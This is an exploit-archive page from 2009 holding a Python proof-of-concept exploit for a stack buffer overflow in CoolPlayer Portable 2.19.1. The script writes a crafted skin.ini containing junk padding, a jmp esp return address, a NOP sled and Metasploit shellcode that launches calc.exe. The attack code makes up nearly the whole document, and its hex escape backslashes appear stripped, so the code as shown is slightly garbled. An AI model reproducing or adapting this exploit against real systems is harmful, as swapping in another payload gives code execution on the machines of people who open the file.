[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow Exploit
# Published : 2009-04-23
# Author : Stack
# Previous Title : CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit
# Next Title : Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit
# CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow exploit
# Credit To Gold_m http://www.milw0rm.com/exploits/8489
# By Stack Sysworm.com
# Note abouts this Exploit : right click >> Option >> Open >> select our target file and boooooom calc executed :d
# Note abouts the last exploit (m3u): my first Exploit Have just 212 + 4 - Junk + eip i dont know why didin't be the same for my sweety freind His0ka
# When i test He's exploit it didin't work and the ret adress be far from eip register and it overwrited by A's junk i dont know why but i think the junk change from box to box
# Thnx for all freind ( Jadi - Mr.Safa7 - Hod - His0ka - Djekmani etc ......
# Thnx for the great str0ke thnx for your support :d
chars = "x41" * 1504
eip = "xEDx1Ex94x7C" # ntdll.dll jmp esp SP 2 FR / EN
header = "[CoolPlayer Skin]nPlaylistSkin="
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x30x42x30x42x50x4bx38x45x44x4ex43x4bx48x4ex37"
"x45x50x4ax47x41x50x4fx4ex4bx58x4fx44x4ax41x4bx38"
"x4fx45x42x52x41x50x4bx4ex49x54x4bx48x46x33x4bx58"
"x41x30x50x4ex41x53x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x37x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx43x46x35x46x42x46x50x45x47x45x4ex4bx38"
"x4fx55x46x52x41x30x4bx4ex48x56x4bx58x4ex30x4bx34"
"x4bx58x4fx45x4ex51x41x50x4bx4ex4bx58x4ex41x4bx58"
"x41x50x4bx4ex49x38x4ex35x46x52x46x30x43x4cx41x53"
"x42x4cx46x56x4bx38x42x54x42x43x45x58x42x4cx4ax57"
"x4ex50x4bx58x42x44x4ex50x4bx58x42x57x4ex41x4dx4a"
"x4bx48x4ax46x4ax50x4bx4ex49x50x4bx38x42x58x42x4b"
"x42x50x42x50x42x30x4bx48x4ax36x4ex33x4fx55x41x53"
"x48x4fx42x46x48x35x49x48x4ax4fx43x48x42x4cx4bx57"
"x42x35x4ax36x42x4fx4cx58x46x50x4fx55x4ax56x4ax49"
"x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x56x41x56"
"x4ex36x43x56x50x52x45x36x4ax37x45x46x42x50x5a")
poc = (header+chars+eip+"x90"*10+shellcode)
file = open('skin.ini','w+')
file.write(poc)
file.close()
# www.Syue.com [2009-04-23]